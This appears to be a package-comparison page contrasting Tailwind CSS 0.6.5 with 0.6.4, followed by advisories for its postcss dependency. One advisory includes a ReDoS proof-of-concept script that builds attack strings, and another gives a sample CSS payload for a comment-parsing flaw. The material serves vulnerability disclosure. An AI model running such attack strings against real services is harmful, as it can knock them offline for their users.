Tailwind CSS version 0.6.5 presents a minor update over its predecessor, version 0.6.4, within the rapidly evolving landscape of utility-first CSS frameworks. Both versions maintain identical core dependencies, crucial for the framework's functionality. These shared dependencies include foundational libraries like lodash, postcss, fs-extra, commander, css.escape, postcss-js, perfectionist, postcss-nested, postcss-functions, and postcss-selector-parser, indicating a stable base upon which Tailwind CSS operates. Similarly, the development dependencies, essential for building and testing the framework, remain consistent across both versions, encompassing tools like nsp, jest, eslint, rimraf, prettier, and various Babel presets and plugins.
The primary distinction lies in the dist object, specifically the unpackedSize. Version 0.6.5 exhibits a slightly larger unpacked size of 2039231 bytes compared to version 0.6.4's 2039202 bytes, a difference of merely 29 bytes. This suggests a minor refinement, potentially involving bug fixes, documentation updates, or very small code optimizations. Crucially, both versions maintain the same fileCount of 112, implying no structural changes to the project's file organization. Version 0.6.5 was released on August 14, 2018, following version 0.6.4, released on July 16, 2018. Developers considering upgrading should weigh the benefits of potential minor improvements against the stability of their existing setup. If facing any bugs in version 0.6.4, upgrading should definitely be considered.
All the vulnerabilities related to the version 0.6.5 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.